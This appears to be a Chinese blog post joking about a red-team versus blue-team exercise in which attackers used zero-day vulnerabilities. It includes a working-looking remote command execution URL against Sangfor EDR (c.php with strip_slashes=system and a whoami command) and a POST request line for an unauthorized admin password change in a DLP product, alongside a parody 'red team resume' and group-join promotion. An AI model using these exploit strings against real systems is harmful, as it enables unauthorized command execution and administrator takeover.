昨天说:蓝队注意,吃饱点。马上开始就没时间吃饭了。红队0day满天飞,社工满地跑。打脸了,草率了。现在不是吃不吃饱,现在是没饭吃了。
之前红队,先扫描一下踩个点,再手动搞搞,现在上来就王炸加飞机,跑了。
深X信EDR,下回我要见到深X信EDR的开发人员,直接打屎!原因大家都懂。
https://ip+端口/tool/log/c.php?strip_slashes=system&host=whoami
除上面之外,还有任意文件读取,验证码绕过,还有就是rce。你上宽字节那个公众号上发了,可以去看看。
漏洞影响:已知版本号v3.1130.308p3_DLP.1
漏洞细节:管理员登陆系统之后修改密码,未采用原由码校验,且存在未授权访问导致存在了越权修改管理员密码.
POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1
蓝队三大错觉,我能反杀,我能秀,我觉得死不了。结果,红队大佬牛B,一天给半个月活都干完了。这就叫,犀利红队,会注入,会上传,会Xss,会破解,会嗅探,会开发,会业务,会运维,渗透,社工,调戏客服MM,无不精通,祖传三代红队。电话通知后10秒钟上线,身体强壮可持续渗透7天7夜,上千万肉鸡Ddos流量永不停歇,上至深信服、360、融信、下至刷致远OA,刷泛微OA。备用电源,千兆光纤,无线网卡,永不断网,备用电脑一台,发电机二台(含柴油100升)。本人身体强壮,健步如飞,可连续编程20小时不休息,讨论技术方案5小时不喝水,上至带项目、出方案,下至盗号威胁pm,什么都能干。本人意识猥琐,技艺娴熟,0day丰富,能上各种渗透工具,怕延迟可直接接受电话指挥,语音指挥。全面漏洞认识深刻,熟练掌握各种渗透理论,认真学习过《白帽子讲web安全》《Metasploit渗透测试指南》《Web之困》等专业书籍。深山苦练30年,一天只睡4小时,脾气好,不喷人,操作虎,意识强,渗透快,shell多,能过狗,能过盾,听指挥,千里之外取服务器首级,瞬息之间爆管理员菊花,日站如杀鸡,压安全狗如压草芥,第一时间赶到渗透现场。
一个月改半月,半个月改一天,天秀吧?昨建了个群,大家联动封ip,有位雷锋同学,建一个页面,
https://www.0daybank.org/?p=61283
![上来直接放0day大招,一天给一个月的活干完了!]( "上来直接放0day大招,一天给一个月的活干完了!")
![上来直接放0day大招,一天给一个月的活干完了!]( "上来直接放0day大招,一天给一个月的活干完了!")
没想到呀!上来红队直接放0day大招。还是红队大佬牛逼呀,
汗,现在都不重要了,我正准备解散群,我准备回家了,你回家了吗?
新建个群吧,最新动向是否重开,到时候群里互通消息吧。
![上来直接放0day大招,一天给一个月的活干完了!]( "上来直接放0day大招,一天给一个月的活干完了!")
微信群老满员,点赞,点好看,分享朋友圈,之后加运营微信:shuang77169,会给你拉进群。
微信群最多200人,这个Qq群可以2000人,微信不方便就加Qq群吧。
群名称:蓝队联动作战协同中心
群 号:564828953
![上来直接放0day大招,一天给一个月的活干完了!]( "上来直接放0day大招,一天给一个月的活干完了!")
![上来直接放0day大招,一天给一个月的活干完了!]( "上来直接放0day大招,一天给一个月的活干完了!")
![上来直接放0day大招,一天给一个月的活干完了!]( "上来直接放0day大招,一天给一个月的活干完了!")
评论